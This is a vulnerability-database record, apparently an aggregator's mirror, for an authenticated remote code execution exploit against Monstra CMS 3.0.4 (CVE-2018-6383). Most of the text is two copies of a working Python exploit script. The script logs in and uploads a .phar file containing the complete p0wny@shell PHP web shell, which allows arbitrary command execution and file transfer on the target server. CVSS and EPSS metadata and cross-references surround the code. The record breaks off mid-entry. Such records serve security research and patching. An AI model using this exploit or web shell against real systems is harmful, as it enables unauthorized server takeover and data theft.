Monstra CMS 3.0.4 Remote Code Execution

2021-06-04T00:00:00

Description

{"id": "PACKETSTORM:162968", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Monstra CMS 3.0.4 Remote Code Execution", "description": "", "published": "2021-06-04T00:00:00", "modified": "2021-06-04T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/162968/Monstra-CMS-3.0.4-Remote-Code-Execution.html", "reporter": "Ron Jost", "references": [], "cvelist": ["CVE-2017-18048", "CVE-2018-6383"], "immutableFields": [], "lastseen": "2021-06-04T16:20:06", "viewCount": 294, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0765"]}, {"type": "cve", "idList": ["CVE-2017-18048", "CVE-2018-6383", "CVE-2020-13384"]}, {"type": "exploitdb", "idList": ["EDB-ID:44045", "EDB-ID:49949"]}, {"type": "kitploit", "idList": ["KITPLOIT:796948219352081870"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113204"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148487"]}, {"type": "zdt", "idList": ["1337DAY-ID-30704", "1337DAY-ID-36353"]}]}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0765"]}, {"type": "cve", "idList": ["CVE-2017-18048"]}, {"type": "exploitdb", "idList": ["EDB-ID:44045"]}, {"type": "kitploit", "idList": ["KITPLOIT:796948219352081870"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/MONSTRA_FILEUPLOAD_EXEC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113204"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148487"]}, {"type": "zdt", "idList": ["1337DAY-ID-30704"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-18048", "epss": "0.925480000", "percentile": "0.984100000", "modified": "2023-03-17"}, {"cve": "CVE-2018-6383", "epss": "0.026850000", "percentile": "0.887850000", "modified": "2023-03-17"}], "vulnersScore": 0.3}, "_state": {"dependencies": 1678920471, "score": 1698842189, "epss": 1679073339}, "_internal": {"score_hash": "df182767834b9f7ee57bf8b922efcabf"}, "sourceHref": "https://packetstormsecurity.com/files/download/162968/monstracms304auth-exec.txt", "sourceData": "`# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) \n# Date: 03.06.2021 \n# Exploit Author: Ron Jost (hacker5preme) \n# Vendor Homepage: https://monstra.org/ \n# Software Link: https://monstra.org/monstra-3.0.4.zip \n# Version: 3.0.4 \n# Tested on: Ubuntu 20.04 \n# CVE: CVE-2018-6383 \n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit \n \n''' \nDescription: \nMonstra CMS through 3.0.4 has an incomplete \"forbidden types\" list that excludes .php (and similar) file extensions \nbut not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code \nby uploading a file, a different vulnerability than CVE-2017-18048. \n''' \n \n \n''' \nImport required modules: \n''' \nimport argparse \nimport requests \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383') \nmy_parser.add_argument('-T', type=str, help='Target IP') \nmy_parser.add_argument('-P', type=str, help='Target Port') \nmy_parser.add_argument(\"-U\", type=str, help=\"Monstra CMS Path\") \nmy_parser.add_argument('-u', type=str, help=\"Username\") \nmy_parser.add_argument('-p', type=str, help='Password') \nargs = my_parser.parse_args() \ntarget_ip = args.T \ntarget_port = args.P \nMonstracms_path = args.U \nusername = args.u \npassword = args.p \n \n \n''' \nExploit: \n''' \n# Cookies: \nsession = requests.Session() \nurl = \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php' \ncookies = session.get(url).cookies.get_dict() \nvalue = cookies['PHPSESSID'] \ncookies = { \n\"__atuvc\": \"9%7C22\", \n'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9' \n} \n \n# Construct authentication header: \nheaders = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Content-Type\": \"application/x-www-form-urlencoded\", \n\"Origin\": \"http://\" + target_ip, \n\"Connection\": \"close\", \n\"Referer\": \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php', \n\"Upgrade-Insecure-Requests\": \"1\"} \n \n# Construct authentication body \nbody = { \n\"login\": username, \n\"password\": password, \n\"login_submit\": \"Log In\"} \nx = requests.post(url, headers=headers, cookies=cookies, data=body) \n \n# Construct Exploit link: \nurl = \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager' \n \n# Construct Exploit header: \nheader = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Content-Type\": \"multipart/form-data; boundary=---------------------------27822155982314896762160847658\", \n\"Origin\": \"http://\" + target_ip, \n\"Connection\": \"close\", \n\"Referer\": \"http://\" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager', \n\"Upgrade-Insecure-Requests\": \"1\" \n} \n \n# Construct Exploit data: \nburp0_data = \"-----------------------------27822155982314896762160847658\\r\\nContent-Disposition: form-data; name=\\\"csrf\\\"\\r\\n\\r\\n1e71963993909d612c40962b401c556b70e9bb3c\\r\\n-----------------------------27822155982314896762160847658\\r\\nContent-Disposition: form-data; name=\\\"file\\\"; filename=\\\"shell.phar\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800 \n \n# Exploit: \nx = requests.post(url, headers=header, cookies=cookies, data=burp0_data) \n \n# Finish: \nprint('') \nprint('Please login in your webrowser and then open the following URL:') \nprint('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar') \nprint('') \n \n`\n"}

{"zdt": [{"lastseen": "2021-12-04T15:54:09", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "zdt", "title": "Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18048", "CVE-2018-6383"], "modified": "2021-06-04T00:00:00", "id": "1337DAY-ID-36353", "href": "https://0day.today/exploit/description/36353", "sourceData": "# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)\n# Exploit Author: Ron Jost (hacker5preme)\n# Vendor Homepage: https://monstra.org/\n# Software Link: https://monstra.org/monstra-3.0.4.zip\n# Version: 3.0.4\n# Tested on: Ubuntu 20.04\n# CVE: CVE-2018-6383\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit\n\n'''\nDescription:\nMonstra CMS through 3.0.4 has an incomplete \"forbidden types\" list that excludes .php (and similar) file extensions\nbut not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code\n by uploading a file, a different vulnerability than CVE-2017-18048.\n'''\n\n\n'''\nImport required modules:\n'''\nimport argparse\nimport requests\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383')\nmy_parser.add_argument('-T', type=str, help='Target IP')\nmy_parser.add_argument('-P', type=str, help='Target Port')\nmy_parser.add_argument(\"-U\", type=str, help=\"Monstra CMS Path\")\nmy_parser.add_argument('-u', type=str, help=\"Username\")\nmy_parser.add_argument('-p', type=str, help='Password')\nargs = my_parser.parse_args()\ntarget_ip = args.T\ntarget_port = args.P\nMonstracms_path = args.U\nusername = args.u\npassword = args.p\n\n\n'''\nExploit:\n'''\n# Cookies:\nsession = requests.Session()\nurl = \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php'\ncookies = session.get(url).cookies.get_dict()\nvalue = cookies['PHPSESSID']\ncookies = {\n \"__atuvc\": \"9%7C22\",\n 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9'\n}\n\n# Construct authentication header:\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Referer\": \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php',\n \"Upgrade-Insecure-Requests\": \"1\"}\n\n# Construct authentication body\nbody = {\n \"login\": username,\n \"password\": password,\n \"login_submit\": \"Log In\"}\nx = requests.post(url, headers=headers, cookies=cookies, data=body)\n\n# Construct Exploit link:\nurl = \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager'\n\n# Construct Exploit header:\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------27822155982314896762160847658\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Referer\": \"http://\" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager',\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Construct Exploit data:\nburp0_data = \"-----------------------------27822155982314896762160847658\\r\\nContent-Disposition: form-data; name=\\\"csrf\\\"\\r\\n\\r\\n1e71963993909d612c40962b401c556b70e9bb3c\\r\\n-----------------------------27822155982314896762160847658\\r\\nContent-Disposition: form-data; name=\\\"file\\\"; filename=\\\"shell.phar\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>[email\u00a0protected]:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"[email\u00a0protected]:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------27822155982314896762160847658\\r\\nContent-Disposition: form-data; name=\\\"upload_file\\\"\\r\\n\\r\\nUpload\\r\\n-----------------------------27822155982314896762160847658--\\r\\n\"\n\n# Exploit:\nx = requests.post(url, headers=header, cookies=cookies, data=burp0_data)\n\n# Finish:\nprint('')\nprint('Please login in your webrowser and then open the following URL:')\nprint('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar')\nprint('')\n", "sourceHref": "https://0day.today/exploit/36353", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2018-07-12T11:57:03", "description": "Monstra CMS 3.0.4 allows users to upload arbitrary files which leads to remote command execution on the remote server. An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This Metasploit module was tested against Monstra CMS 3.0.4.", "cvss3": {}, "published": "2018-07-12T00:00:00", "type": "zdt", "title": "MonstraCMS Authenticated Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 